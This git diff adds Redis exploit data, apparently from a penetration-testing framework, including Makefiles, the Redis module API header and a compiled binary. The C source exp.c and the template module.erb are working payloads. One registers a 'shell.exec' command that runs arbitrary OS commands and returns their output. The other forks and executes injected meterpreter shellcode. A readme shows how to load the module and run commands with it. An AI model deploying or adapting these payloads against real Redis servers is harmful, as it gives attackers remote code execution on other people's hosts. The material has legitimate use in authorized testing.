diff --git a/data/exploits/redis/Makefile b/data/exploits/redis/Makefile new file mode 100644 index 000000000000..a20988825744 --- /dev/null +++ b/data/exploits/redis/Makefile @@ -0,0 +1,35 @@ +#set environment variable RM_INCLUDE_DIR to the location of redismodule.h +ifndef RM_INCLUDE_DIR + RM_INCLUDE_DIR=./ +endif + +ifndef RMUTIL_LIBDIR + RMUTIL_LIBDIR=./rmutil +endif + +# find the OS +uname_S := $(shell sh -c 'uname -s 2>/dev/null || echo not') + +# Compile flags for linux / osx +ifeq ($(uname_S),Linux) + SHOBJ_CFLAGS ?= -fno-common -g -ggdb + SHOBJ_LDFLAGS ?= -shared -Bsymbolic +else + SHOBJ_CFLAGS ?= -dynamic -fno-common -g -ggdb + SHOBJ_LDFLAGS ?= -bundle -undefined dynamic_lookup +endif +CFLAGS = -I$(RM_INCLUDE_DIR) -Wall -g -fPIC -lc -lm -std=gnu99 -fno-stack-protector -z execstack +CC=gcc + +all: rmutil module.so + +rmutil: FORCE + $(MAKE) -C $(RMUTIL_LIBDIR) + +module.so: module.o + $(LD) -o $@ module.o $(SHOBJ_LDFLAGS) $(LIBS) -L$(RMUTIL_LIBDIR) -lrmutil -lc -z execstack + +clean: + rm -rf *.xo *.so *.o + +FORCE: diff --git a/data/exploits/redis/exp/Makefile b/data/exploits/redis/exp/Makefile new file mode 100644 index 000000000000..145a45c826a9 --- /dev/null +++ b/data/exploits/redis/exp/Makefile @@ -0,0 +1,35 @@ +#set environment variable RM_INCLUDE_DIR to the location of redismodule.h +ifndef RM_INCLUDE_DIR + RM_INCLUDE_DIR=../ +endif + +ifndef RMUTIL_LIBDIR + RMUTIL_LIBDIR=../rmutil +endif + +# find the OS +uname_S := $(shell sh -c 'uname -s 2>/dev/null || echo not') + +# Compile flags for linux / osx +ifeq ($(uname_S),Linux) + SHOBJ_CFLAGS ?= -fno-common -g -ggdb + SHOBJ_LDFLAGS ?= -shared -Bsymbolic +else + SHOBJ_CFLAGS ?= -dynamic -fno-common -g -ggdb + SHOBJ_LDFLAGS ?= -bundle -undefined dynamic_lookup +endif +CFLAGS = -I$(RM_INCLUDE_DIR) -Wall -g -fPIC -lc -lm -std=gnu99 -fno-stack-protector -z execstack +CC=gcc + +all: rmutil exp.so + +rmutil: FORCE + $(MAKE) -C $(RMUTIL_LIBDIR) + +exp.so: exp.o + $(LD) -o $@ exp.o $(SHOBJ_LDFLAGS) $(LIBS) -L$(RMUTIL_LIBDIR) -lrmutil -lc -z execstack + +clean: + rm -rf *.xo *.so *.o + +FORCE: diff --git a/data/exploits/redis/exp/exp.c b/data/exploits/redis/exp/exp.c new file mode 100644 index 000000000000..68a7906c538a --- /dev/null +++ b/data/exploits/redis/exp/exp.c @@ -0,0 +1,47 @@ +#include "redismodule.h" + +#include +#include +#include +#include +#include +#include +#include +#include + +int Shell(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) { + if (argc == 2) { + size_t cmd_len; + size_t size = 1024; + char *cmd = RedisModule_StringPtrLen(argv[1], &cmd_len); + + FILE *fp = popen(cmd, "r"); + char *buf, *output; + buf = (char *)malloc(size); + output = (char *)malloc(size); + while ( fgets(buf, sizeof(buf), fp) != 0 ) { + if (strlen(buf) + strlen(output) >= size) { + output = realloc(output, size<<2); + size <<= 1; + } + strcat(output, buf); + } + RedisModuleString *ret = RedisModule_CreateString(ctx, output, strlen(output)); + RedisModule_ReplyWithString(ctx, ret); + pclose(fp); + } else { + return RedisModule_WrongArity(ctx); + } + return REDISMODULE_OK; +} + +int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) { + if (RedisModule_Init(ctx,"shell",1,REDISMODULE_APIVER_1) + == REDISMODULE_ERR) return REDISMODULE_ERR; + + if (RedisModule_CreateCommand(ctx, "shell.exec", + Shell, "readonly", 1, 1, 1) == REDISMODULE_ERR) + return REDISMODULE_ERR; + + return REDISMODULE_OK; +} diff --git a/data/exploits/redis/exp/exp.so b/data/exploits/redis/exp/exp.so new file mode 100755 index 000000000000..a37fea39e19e Binary files /dev/null and b/data/exploits/redis/exp/exp.so differ diff --git a/data/exploits/redis/exp/readme.md b/data/exploits/redis/exp/readme.md new file mode 100644 index 000000000000..ad88f82d55b4 --- /dev/null +++ b/data/exploits/redis/exp/readme.md @@ -0,0 +1,23 @@ +## Intro + +This is a compiled shared object file of redis module. + +## Load redis extension + +``` +MODULE load ./exp.so +``` + +## Run command + +``` +redis-cli +127.0.0.1:6379> shell.exec "whoami" +``` +## Compile + +You can modify the exp.c source code if you want. +And the compile it to exp.so in current directory. +``` +make +``` diff --git a/data/exploits/redis/module.erb b/data/exploits/redis/module.erb new file mode 100644 index 000000000000..abb3f18c537f --- /dev/null +++ b/data/exploits/redis/module.erb @@ -0,0 +1,38 @@ +#include "redismodule.h" + +#include +#include +#include +#include +#include +#include +#include +#include + +int Shell(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) { + + pid_t child_pid = fork(); + if (child_pid == 0) + { + // Your meterpreter shell here + <%= buf %> + + int (*ret)() = (int(*)())buf; + ret(); + } + else + {wait(NULL);} + + return REDISMODULE_OK; +} + + +int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) { + if (RedisModule_Init(ctx,<%= @module_init_name.inspect %>,1,REDISMODULE_APIVER_1) + == REDISMODULE_ERR) return REDISMODULE_ERR; + + if (RedisModule_CreateCommand(ctx, <%= @module_cmd.inspect %>, + Shell, "readonly", 1, 1, 1) == REDISMODULE_ERR) + return REDISMODULE_ERR; + return REDISMODULE_OK; +} diff --git a/data/exploits/redis/redismodule.h b/data/exploits/redis/redismodule.h new file mode 100644 index 000000000000..c334d2c902e6 --- /dev/null +++ b/data/exploits/redis/redismodule.h @@ -0,0 +1,509 @@ +#ifndef REDISMODULE_H +#define REDISMODULE_H + +#include +#include +#include + +/* ---------------- Defines common between core and modules --------------- */ + +/* Error status return values. */ +#define REDISMODULE_OK 0 +#define REDISMODULE_ERR 1 + +/* API versions. */ +#define REDISMODULE_APIVER_1 1 + +/* API flags and constants */ +#define REDISMODULE_READ (1<<0) +#define REDISMODULE_WRITE (1<<1) + +#define REDISMODULE_LIST_HEAD 0 +#define REDISMODULE_LIST_TAIL 1 + +/* Key types. */ +#define REDISMODULE_KEYTYPE_EMPTY 0 +#define REDISMODULE_KEYTYPE_STRING 1 +#define REDISMODULE_KEYTYPE_LIST 2 +#define REDISMODULE_KEYTYPE_HASH 3 +#define REDISMODULE_KEYTYPE_SET 4 +#define REDISMODULE_KEYTYPE_ZSET 5 +#define REDISMODULE_KEYTYPE_MODULE 6 + +/* Reply types. */ +#define REDISMODULE_REPLY_UNKNOWN -1 +#define REDISMODULE_REPLY_STRING 0 +#define REDISMODULE_REPLY_ERROR 1 +#define REDISMODULE_REPLY_INTEGER 2 +#define REDISMODULE_REPLY_ARRAY 3 +#define REDISMODULE_REPLY_NULL 4 + +/* Postponed array length. */ +#define REDISMODULE_POSTPONED_ARRAY_LEN -1 + +/* Expire */ +#define REDISMODULE_NO_EXPIRE -1 + +/* Sorted set API flags. */ +#define REDISMODULE_ZADD_XX (1<<0) +#define REDISMODULE_ZADD_NX (1<<1) +#define REDISMODULE_ZADD_ADDED (1<<2) +#define REDISMODULE_ZADD_UPDATED (1<<3) +#define REDISMODULE_ZADD_NOP (1<<4) + +/* Hash API flags. */ +#define REDISMODULE_HASH_NONE 0 +#define REDISMODULE_HASH_NX (1<<0) +#define REDISMODULE_HASH_XX (1<<1) +#define REDISMODULE_HASH_CFIELDS (1<<2) +#define REDISMODULE_HASH_EXISTS (1<<3) + +/* Context Flags: Info about the current context returned by + * RM_GetContextFlags(). */ + +/* The command is running in the context of a Lua script */ +#define REDISMODULE_CTX_FLAGS_LUA (1<<0) +/* The command is running inside a Redis transaction */ +#define REDISMODULE_CTX_FLAGS_MULTI (1<<1) +/* The instance is a master */ +#define REDISMODULE_CTX_FLAGS_MASTER (1<<2) +/* The instance is a slave */ +#define REDISMODULE_CTX_FLAGS_SLAVE (1<<3) +/* The instance is read-only (usually meaning it's a slave as well) */ +#define REDISMODULE_CTX_FLAGS_READONLY (1<<4) +/* The instance is running in cluster mode */ +#define REDISMODULE_CTX_FLAGS_CLUSTER (1<<5) +/* The instance has AOF enabled */ +#define REDISMODULE_CTX_FLAGS_AOF (1<<6) +/* The instance has RDB enabled */ +#define REDISMODULE_CTX_FLAGS_RDB (1<<7) +/* The instance has Maxmemory set */ +#define REDISMODULE_CTX_FLAGS_MAXMEMORY (1<<8) +/* Maxmemory is set and has an eviction policy that may delete keys */ +#define REDISMODULE_CTX_FLAGS_EVICT (1<<9) +/* Redis is out of memory according to the maxmemory flag. */ +#define REDISMODULE_CTX_FLAGS_OOM (1<<10) +/* Less than 25% of memory available according to maxmemory. */ +#define REDISMODULE_CTX_FLAGS_OOM_WARNING (1<<11) + +#define REDISMODULE_NOTIFY_GENERIC (1<<2) /* g */ +#define REDISMODULE_NOTIFY_STRING (1<<3) /* $ */ +#define REDISMODULE_NOTIFY_LIST (1<<4) /* l */ +#define REDISMODULE_NOTIFY_SET (1<<5) /* s */ +#define REDISMODULE_NOTIFY_HASH (1<<6) /* h */ +#define REDISMODULE_NOTIFY_ZSET (1<<7) /* z */ +#define REDISMODULE_NOTIFY_EXPIRED (1<<8) /* x */ +#define REDISMODULE_NOTIFY_EVICTED (1<<9) /* e */ +#define REDISMODULE_NOTIFY_STREAM (1<<10) /* t */ +#define REDISMODULE_NOTIFY_ALL (REDISMODULE_NOTIFY_GENERIC | REDISMODULE_NOTIFY_STRING | REDISMODULE_NOTIFY_LIST | REDISMODULE_NOTIFY_SET | REDISMODULE_NOTIFY_HASH | REDISMODULE_NOTIFY_ZSET | REDISMODULE_NOTIFY_EXPIRED | REDISMODULE_NOTIFY_EVICTED | REDISMODULE_NOTIFY_STREAM) /* A */ + + +/* A special pointer that we can use between the core and the module to signal + * field deletion, and that is impossible to be a valid pointer. */ +#define REDISMODULE_HASH_DELETE ((RedisModuleString*)(long)1) + +/* Error messages. */ +#define REDISMODULE_ERRORMSG_WRONGTYPE "WRONGTYPE Operation against a key holding the wrong kind of value" + +#define REDISMODULE_POSITIVE_INFINITE (1.0/0.0) +#define REDISMODULE_NEGATIVE_INFINITE (-1.0/0.0) + +/* Cluster API defines. */ +#define REDISMODULE_NODE_ID_LEN 40 +#define REDISMODULE_NODE_MYSELF (1<<0) +#define REDISMODULE_NODE_MASTER (1<<1) +#define REDISMODULE_NODE_SLAVE (1<<2) +#define REDISMODULE_NODE_PFAIL (1<<3) +#define REDISMODULE_NODE_FAIL (1<<4) +#define REDISMODULE_NODE_NOFAILOVER (1<<5) + +#define REDISMODULE_CLUSTER_FLAG_NONE 0 +#define REDISMODULE_CLUSTER_FLAG_NO_FAILOVER (1<<1) +#define REDISMODULE_CLUSTER_FLAG_NO_REDIRECTION (1<<2) + +#define REDISMODULE_NOT_USED(V) ((void) V) + +/* This type represents a timer handle, and is returned when a timer is + * registered and used in order to invalidate a timer. It's just a 64 bit + * number, because this is how each timer is represented inside the radix tree + * of timers that are going to expire, sorted by expire time. */ +typedef uint64_t RedisModuleTimerID; + +/* ------------------------- End of common defines ------------------------ */ + +#ifndef REDISMODULE_CORE + +typedef long long mstime_t; + +/* Incomplete structures for compiler checks but opaque access. */ +typedef struct RedisModuleCtx RedisModuleCtx; +typedef struct RedisModuleKey RedisModuleKey; +typedef struct RedisModuleString RedisModuleString; +typedef struct RedisModuleCallReply RedisModuleCallReply; +typedef struct RedisModuleIO RedisModuleIO; +typedef struct RedisModuleType RedisModuleType; +typedef struct RedisModuleDigest RedisModuleDigest; +typedef struct RedisModuleBlockedClient RedisModuleBlockedClient; +typedef struct RedisModuleClusterInfo RedisModuleClusterInfo; +typedef struct RedisModuleDict RedisModuleDict; +typedef struct RedisModuleDictIter RedisModuleDictIter; + +typedef int (*RedisModuleCmdFunc)(RedisModuleCtx *ctx, RedisModuleString **argv, int argc); +typedef void (*RedisModuleDisconnectFunc)(RedisModuleCtx *ctx, RedisModuleBlockedClient *bc); +typedef int (*RedisModuleNotificationFunc)(RedisModuleCtx *ctx, int type, const char *event, RedisModuleString *key); +typedef void *(*RedisModuleTypeLoadFunc)(RedisModuleIO *rdb, int encver); +typedef void (*RedisModuleTypeSaveFunc)(RedisModuleIO *rdb, void *value); +typedef void (*RedisModuleTypeRewriteFunc)(RedisModuleIO *aof, RedisModuleString *key, void *value); +typedef size_t (*RedisModuleTypeMemUsageFunc)(const void *value); +typedef void (*RedisModuleTypeDigestFunc)(RedisModuleDigest *digest, void *value); +typedef void (*RedisModuleTypeFreeFunc)(void *value); +typedef void (*RedisModuleClusterMessageReceiver)(RedisModuleCtx *ctx, const char *sender_id, uint8_t type, const unsigned char *payload, uint32_t len); +typedef void (*RedisModuleTimerProc)(RedisModuleCtx *ctx, void *data); + +#define REDISMODULE_TYPE_METHOD_VERSION 1 +typedef struct RedisModuleTypeMethods { + uint64_t version; + RedisModuleTypeLoadFunc rdb_load; + RedisModuleTypeSaveFunc rdb_save; + RedisModuleTypeRewriteFunc aof_rewrite; + RedisModuleTypeMemUsageFunc mem_usage; + RedisModuleTypeDigestFunc digest; + RedisModuleTypeFreeFunc free; +} RedisModuleTypeMethods; + +#define REDISMODULE_GET_API(name) \ + RedisModule_GetApi("RedisModule_" #name, ((void **)&RedisModule_ ## name)) + +#define REDISMODULE_API_FUNC(x) (*x) + + +void *REDISMODULE_API_FUNC(RedisModule_Alloc)(size_t bytes); +void *REDISMODULE_API_FUNC(RedisModule_Realloc)(void *ptr, size_t bytes); +void REDISMODULE_API_FUNC(RedisModule_Free)(void *ptr); +void *REDISMODULE_API_FUNC(RedisModule_Calloc)(size_t nmemb, size_t size); +char *REDISMODULE_API_FUNC(RedisModule_Strdup)(const char *str); +int REDISMODULE_API_FUNC(RedisModule_GetApi)(const char *, void *); +int REDISMODULE_API_FUNC(RedisModule_CreateCommand)(RedisModuleCtx *ctx, const char *name, RedisModuleCmdFunc cmdfunc, const char *strflags, int firstkey, int lastkey, int keystep); +void REDISMODULE_API_FUNC(RedisModule_SetModuleAttribs)(RedisModuleCtx *ctx, const char *name, int ver, int apiver); +int REDISMODULE_API_FUNC(RedisModule_IsModuleNameBusy)(const char *name); +int REDISMODULE_API_FUNC(RedisModule_WrongArity)(RedisModuleCtx *ctx); +int REDISMODULE_API_FUNC(RedisModule_ReplyWithLongLong)(RedisModuleCtx *ctx, long long ll); +int REDISMODULE_API_FUNC(RedisModule_GetSelectedDb)(RedisModuleCtx *ctx); +int REDISMODULE_API_FUNC(RedisModule_SelectDb)(RedisModuleCtx *ctx, int newid); +void *REDISMODULE_API_FUNC(RedisModule_OpenKey)(RedisModuleCtx *ctx, RedisModuleString *keyname, int mode); +void REDISMODULE_API_FUNC(RedisModule_CloseKey)(RedisModuleKey *kp); +int REDISMODULE_API_FUNC(RedisModule_KeyType)(RedisModuleKey *kp); +size_t REDISMODULE_API_FUNC(RedisModule_ValueLength)(RedisModuleKey *kp); +int REDISMODULE_API_FUNC(RedisModule_ListPush)(RedisModuleKey *kp, int where, RedisModuleString *ele); +RedisModuleString *REDISMODULE_API_FUNC(RedisModule_ListPop)(RedisModuleKey *key, int where); +RedisModuleCallReply *REDISMODULE_API_FUNC(RedisModule_Call)(RedisModuleCtx *ctx, const char *cmdname, const char *fmt, ...); +const char *REDISMODULE_API_FUNC(RedisModule_CallReplyProto)(RedisModuleCallReply *reply, size_t *len); +void REDISMODULE_API_FUNC(RedisModule_FreeCallReply)(RedisModuleCallReply *reply); +int REDISMODULE_API_FUNC(RedisModule_CallReplyType)(RedisModuleCallReply *reply); +long long REDISMODULE_API_FUNC(RedisModule_CallReplyInteger)(RedisModuleCallReply *reply); +size_t REDISMODULE_API_FUNC(RedisModule_CallReplyLength)(RedisModuleCallReply *reply); +RedisModuleCallReply *REDISMODULE_API_FUNC(RedisModule_CallReplyArrayElement)(RedisModuleCallReply *reply, size_t idx); +RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateString)(RedisModuleCtx *ctx, const char *ptr, size_t len); +RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateStringFromLongLong)(RedisModuleCtx *ctx, long long ll); +RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateStringFromString)(RedisModuleCtx *ctx, const RedisModuleString *str); +RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateStringPrintf)(RedisModuleCtx *ctx, const char *fmt, ...); +void REDISMODULE_API_FUNC(RedisModule_FreeString)(RedisModuleCtx *ctx, RedisModuleString *str); +const char *REDISMODULE_API_FUNC(RedisModule_StringPtrLen)(const RedisModuleString *str, size_t *len); +int REDISMODULE_API_FUNC(RedisModule_ReplyWithError)(RedisModuleCtx *ctx, const char *err); +int REDISMODULE_API_FUNC(RedisModule_ReplyWithSimpleString)(RedisModuleCtx *ctx, const char *msg); +int REDISMODULE_API_FUNC(RedisModule_ReplyWithArray)(RedisModuleCtx *ctx, long len); +void REDISMODULE_API_FUNC(RedisModule_ReplySetArrayLength)(RedisModuleCtx *ctx, long len); +int REDISMODULE_API_FUNC(RedisModule_ReplyWithStringBuffer)(RedisModuleCtx *ctx, const char *buf, size_t len); +int REDISMODULE_API_FUNC(RedisModule_ReplyWithString)(RedisModuleCtx *ctx, RedisModuleString *str); +int REDISMODULE_API_FUNC(RedisModule_ReplyWithNull)(RedisModuleCtx *ctx); +int REDISMODULE_API_FUNC(RedisModule_ReplyWithDouble)(RedisModuleCtx *ctx, double d); +int REDISMODULE_API_FUNC(RedisModule_ReplyWithCallReply)(RedisModuleCtx *ctx, RedisModuleCallReply *reply); +int REDISMODULE_API_FUNC(RedisModule_StringToLongLong)(const RedisModuleString *str, long long *ll); +int REDISMODULE_API_FUNC(RedisModule_StringToDouble)(const RedisModuleString *str, double *d); +void REDISMODULE_API_FUNC(RedisModule_AutoMemory)(RedisModuleCtx *ctx); +int REDISMODULE_API_FUNC(RedisModule_Replicate)(RedisModuleCtx *ctx, const char *cmdname, const char *fmt, ...); +int REDISMODULE_API_FUNC(RedisModule_ReplicateVerbatim)(RedisModuleCtx *ctx); +const char *REDISMODULE_API_FUNC(RedisModule_CallReplyStringPtr)(RedisModuleCallReply *reply, size_t *len); +RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateStringFromCallReply)(RedisModuleCallReply *reply); +int REDISMODULE_API_FUNC(RedisModule_DeleteKey)(RedisModuleKey *key); +int REDISMODULE_API_FUNC(RedisModule_UnlinkKey)(RedisModuleKey *key); +int REDISMODULE_API_FUNC(RedisModule_StringSet)(RedisModuleKey *key, RedisModuleString *str); +char *REDISMODULE_API_FUNC(RedisModule_StringDMA)(RedisModuleKey *key, size_t *len, int mode); +int REDISMODULE_API_FUNC(RedisModule_StringTruncate)(RedisModuleKey *key, size_t newlen); +mstime_t REDISMODULE_API_FUNC(RedisModule_GetExpire)(RedisModuleKey *key); +int REDISMODULE_API_FUNC(RedisModule_SetExpire)(RedisModuleKey *key, mstime_t expire); +int REDISMODULE_API_FUNC(RedisModule_ZsetAdd)(RedisModuleKey *key, double score, RedisModuleString *ele, int *flagsptr); +int REDISMODULE_API_FUNC(RedisModule_ZsetIncrby)(RedisModuleKey *key, double score, RedisModuleString *ele, int *flagsptr, double *newscore); +int REDISMODULE_API_FUNC(RedisModule_ZsetScore)(RedisModuleKey *key, RedisModuleString *ele, double *score); +int REDISMODULE_API_FUNC(RedisModule_ZsetRem)(RedisModuleKey *key, RedisModuleString *ele, int *deleted); +void REDISMODULE_API_FUNC(RedisModule_ZsetRangeStop)(RedisModuleKey *key); +int REDISMODULE_API_FUNC(RedisModule_ZsetFirstInScoreRange)(RedisModuleKey *key, double min, double max, int minex, int maxex); +int REDISMODULE_API_FUNC(RedisModule_ZsetLastInScoreRange)(RedisModuleKey *key, double min, double max, int minex, int maxex); +int REDISMODULE_API_FUNC(RedisModule_ZsetFirstInLexRange)(RedisModuleKey *key, RedisModuleString *min, RedisModuleString *max); +int REDISMODULE_API_FUNC(RedisModule_ZsetLastInLexRange)(RedisModuleKey *key, RedisModuleString *min, RedisModuleString *max); +RedisModuleString *REDISMODULE_API_FUNC(RedisModule_ZsetRangeCurrentElement)(RedisModuleKey *key, double *score); +int REDISMODULE_API_FUNC(RedisModule_ZsetRangeNext)(RedisModuleKey *key); +int REDISMODULE_API_FUNC(RedisModule_ZsetRangePrev)(RedisModuleKey *key); +int REDISMODULE_API_FUNC(RedisModule_ZsetRangeEndReached)(RedisModuleKey *key); +int REDISMODULE_API_FUNC(RedisModule_HashSet)(RedisModuleKey *key, int flags, ...); +int REDISMODULE_API_FUNC(RedisModule_HashGet)(RedisModuleKey *key, int flags, ...); +int REDISMODULE_API_FUNC(RedisModule_IsKeysPositionRequest)(RedisModuleCtx *ctx); +void REDISMODULE_API_FUNC(RedisModule_KeyAtPos)(RedisModuleCtx *ctx, int pos); +unsigned long long REDISMODULE_API_FUNC(RedisModule_GetClientId)(RedisModuleCtx *ctx); +int REDISMODULE_API_FUNC(RedisModule_GetContextFlags)(RedisModuleCtx *ctx); +void *REDISMODULE_API_FUNC(RedisModule_PoolAlloc)(RedisModuleCtx *ctx, size_t bytes); +RedisModuleType *REDISMODULE_API_FUNC(RedisModule_CreateDataType)(RedisModuleCtx *ctx, const char *name, int encver, RedisModuleTypeMethods *typemethods); +int REDISMODULE_API_FUNC(RedisModule_ModuleTypeSetValue)(RedisModuleKey *key, RedisModuleType *mt, void *value); +RedisModuleType *REDISMODULE_API_FUNC(RedisModule_ModuleTypeGetType)(RedisModuleKey *key); +void *REDISMODULE_API_FUNC(RedisModule_ModuleTypeGetValue)(RedisModuleKey *key); +void REDISMODULE_API_FUNC(RedisModule_SaveUnsigned)(RedisModuleIO *io, uint64_t value); +uint64_t REDISMODULE_API_FUNC(RedisModule_LoadUnsigned)(RedisModuleIO *io); +void REDISMODULE_API_FUNC(RedisModule_SaveSigned)(RedisModuleIO *io, int64_t value); +int64_t REDISMODULE_API_FUNC(RedisModule_LoadSigned)(RedisModuleIO *io); +void REDISMODULE_API_FUNC(RedisModule_EmitAOF)(RedisModuleIO *io, const char *cmdname, const char *fmt, ...); +void REDISMODULE_API_FUNC(RedisModule_SaveString)(RedisModuleIO *io, RedisModuleString *s); +void REDISMODULE_API_FUNC(RedisModule_SaveStringBuffer)(RedisModuleIO *io, const char *str, size_t len); +RedisModuleString *REDISMODULE_API_FUNC(RedisModule_LoadString)(RedisModuleIO *io); +char *REDISMODULE_API_FUNC(RedisModule_LoadStringBuffer)(RedisModuleIO *io, size_t *lenptr); +void REDISMODULE_API_FUNC(RedisModule_SaveDouble)(RedisModuleIO *io, double value); +double REDISMODULE_API_FUNC(RedisModule_LoadDouble)(RedisModuleIO *io); +void REDISMODULE_API_FUNC(RedisModule_SaveFloat)(RedisModuleIO *io, float value); +float REDISMODULE_API_FUNC(RedisModule_LoadFloat)(RedisModuleIO *io); +void REDISMODULE_API_FUNC(RedisModule_Log)(RedisModuleCtx *ctx, const char *level, const char *fmt, ...); +void REDISMODULE_API_FUNC(RedisModule_LogIOError)(RedisModuleIO *io, const char *levelstr, const char *fmt, ...); +int REDISMODULE_API_FUNC(RedisModule_StringAppendBuffer)(RedisModuleCtx *ctx, RedisModuleString *str, const char *buf, size_t len); +void REDISMODULE_API_FUNC(RedisModule_RetainString)(RedisModuleCtx *ctx, RedisModuleString *str); +int REDISMODULE_API_FUNC(RedisModule_StringCompare)(RedisModuleString *a, RedisModuleString *b); +RedisModuleCtx *REDISMODULE_API_FUNC(RedisModule_GetContextFromIO)(RedisModuleIO *io); +long long REDISMODULE_API_FUNC(RedisModule_Milliseconds)(void); +void REDISMODULE_API_FUNC(RedisModule_DigestAddStringBuffer)(RedisModuleDigest *md, unsigned char *ele, size_t len); +void REDISMODULE_API_FUNC(RedisModule_DigestAddLongLong)(RedisModuleDigest *md, long long ele); +void REDISMODULE_API_FUNC(RedisModule_DigestEndSequence)(RedisModuleDigest *md); +RedisModuleDict *REDISMODULE_API_FUNC(RedisModule_CreateDict)(RedisModuleCtx *ctx); +void REDISMODULE_API_FUNC(RedisModule_FreeDict)(RedisModuleCtx *ctx, RedisModuleDict *d); +uint64_t REDISMODULE_API_FUNC(RedisModule_DictSize)(RedisModuleDict *d); +int REDISMODULE_API_FUNC(RedisModule_DictSetC)(RedisModuleDict *d, void *key, size_t keylen, void *ptr); +int REDISMODULE_API_FUNC(RedisModule_DictReplaceC)(RedisModuleDict *d, void *key, size_t keylen, void *ptr); +int REDISMODULE_API_FUNC(RedisModule_DictSet)(RedisModuleDict *d, RedisModuleString *key, void *ptr); +int REDISMODULE_API_FUNC(RedisModule_DictReplace)(RedisModuleDict *d, RedisModuleString *key, void *ptr); +void *REDISMODULE_API_FUNC(RedisModule_DictGetC)(RedisModuleDict *d, void *key, size_t keylen, int *nokey); +void *REDISMODULE_API_FUNC(RedisModule_DictGet)(RedisModuleDict *d, RedisModuleString *key, int *nokey); +int REDISMODULE_API_FUNC(RedisModule_DictDelC)(RedisModuleDict *d, void *key, size_t keylen, void *oldval); +int REDISMODULE_API_FUNC(RedisModule_DictDel)(RedisModuleDict *d, RedisModuleString *key, void *oldval); +RedisModuleDictIter *REDISMODULE_API_FUNC(RedisModule_DictIteratorStartC)(RedisModuleDict *d, const char *op, void *key, size_t keylen); +RedisModuleDictIter *REDISMODULE_API_FUNC(RedisModule_DictIteratorStart)(RedisModuleDict *d, const char *op, RedisModuleString *key); +void REDISMODULE_API_FUNC(RedisModule_DictIteratorStop)(RedisModuleDictIter *di); +int REDISMODULE_API_FUNC(RedisModule_DictIteratorReseekC)(RedisModuleDictIter *di, const char *op, void *key, size_t keylen); +int REDISMODULE_API_FUNC(RedisModule_DictIteratorReseek)(RedisModuleDictIter *di, const char *op, RedisModuleString *key); +void *REDISMODULE_API_FUNC(RedisModule_DictNextC)(RedisModuleDictIter *di, size_t *keylen, void **dataptr); +void *REDISMODULE_API_FUNC(RedisModule_DictPrevC)(RedisModuleDictIter *di, size_t *keylen, void **dataptr); +RedisModuleString *REDISMODULE_API_FUNC(RedisModule_DictNext)(RedisModuleCtx *ctx, RedisModuleDictIter *di, void **dataptr); +RedisModuleString *REDISMODULE_API_FUNC(RedisModule_DictPrev)(RedisModuleCtx *ctx, RedisModuleDictIter *di, void **dataptr); +int REDISMODULE_API_FUNC(RedisModule_DictCompareC)(RedisModuleDictIter *di, const char *op, void *key, size_t keylen); +int REDISMODULE_API_FUNC(RedisModule_DictCompare)(RedisModuleDictIter *di, const char *op, RedisModuleString *key); + +/* Experimental APIs */ +#ifdef REDISMODULE_EXPERIMENTAL_API +#define REDISMODULE_EXPERIMENTAL_API_VERSION 3 +RedisModuleBlockedClient *REDISMODULE_API_FUNC(RedisModule_BlockClient)(RedisModuleCtx *ctx, RedisModuleCmdFunc reply_callback, RedisModuleCmdFunc timeout_callback, void (*free_privdata)(RedisModuleCtx*,void*), long long timeout_ms); +int REDISMODULE_API_FUNC(RedisModule_UnblockClient)(RedisModuleBlockedClient *bc, void *privdata); +int REDISMODULE_API_FUNC(RedisModule_IsBlockedReplyRequest)(RedisModuleCtx *ctx); +int REDISMODULE_API_FUNC(RedisModule_IsBlockedTimeoutRequest)(RedisModuleCtx *ctx); +void *REDISMODULE_API_FUNC(RedisModule_GetBlockedClientPrivateData)(RedisModuleCtx *ctx); +RedisModuleBlockedClient *REDISMODULE_API_FUNC(RedisModule_GetBlockedClientHandle)(RedisModuleCtx *ctx); +int REDISMODULE_API_FUNC(RedisModule_AbortBlock)(RedisModuleBlockedClient *bc); +RedisModuleCtx *REDISMODULE_API_FUNC(RedisModule_GetThreadSafeContext)(RedisModuleBlockedClient *bc); +void REDISMODULE_API_FUNC(RedisModule_FreeThreadSafeContext)(RedisModuleCtx *ctx); +void REDISMODULE_API_FUNC(RedisModule_ThreadSafeContextLock)(RedisModuleCtx *ctx); +void REDISMODULE_API_FUNC(RedisModule_ThreadSafeContextUnlock)(RedisModuleCtx *ctx); +int REDISMODULE_API_FUNC(RedisModule_SubscribeToKeyspaceEvents)(RedisModuleCtx *ctx, int types, RedisModuleNotificationFunc cb); +int REDISMODULE_API_FUNC(RedisModule_BlockedClientDisconnected)(RedisModuleCtx *ctx); +void REDISMODULE_API_FUNC(RedisModule_RegisterClusterMessageReceiver)(RedisModuleCtx *ctx, uint8_t type, RedisModuleClusterMessageReceiver callback); +int REDISMODULE_API_FUNC(RedisModule_SendClusterMessage)(RedisModuleCtx *ctx, char *target_id, uint8_t type, unsigned char *msg, uint32_t len); +int REDISMODULE_API_FUNC(RedisModule_GetClusterNodeInfo)(RedisModuleCtx *ctx, const char *id, char *ip, char *master_id, int *port, int *flags); +char **REDISMODULE_API_FUNC(RedisModule_GetClusterNodesList)(RedisModuleCtx *ctx, size_t *numnodes); +void REDISMODULE_API_FUNC(RedisModule_FreeClusterNodesList)(char **ids); +RedisModuleTimerID REDISMODULE_API_FUNC(RedisModule_CreateTimer)(RedisModuleCtx *ctx, mstime_t period, RedisModuleTimerProc callback, void *data); +int REDISMODULE_API_FUNC(RedisModule_StopTimer)(RedisModuleCtx *ctx, RedisModuleTimerID id, void **data); +int REDISMODULE_API_FUNC(RedisModule_GetTimerInfo)(RedisModuleCtx *ctx, RedisModuleTimerID id, uint64_t *remaining, void **data); +const char *REDISMODULE_API_FUNC(RedisModule_GetMyClusterID)(void); +size_t REDISMODULE_API_FUNC(RedisModule_GetClusterSize)(void); +void REDISMODULE_API_FUNC(RedisModule_GetRandomBytes)(unsigned char *dst, size_t len); +void REDISMODULE_API_FUNC(RedisModule_GetRandomHexChars)(char *dst, size_t len); +void 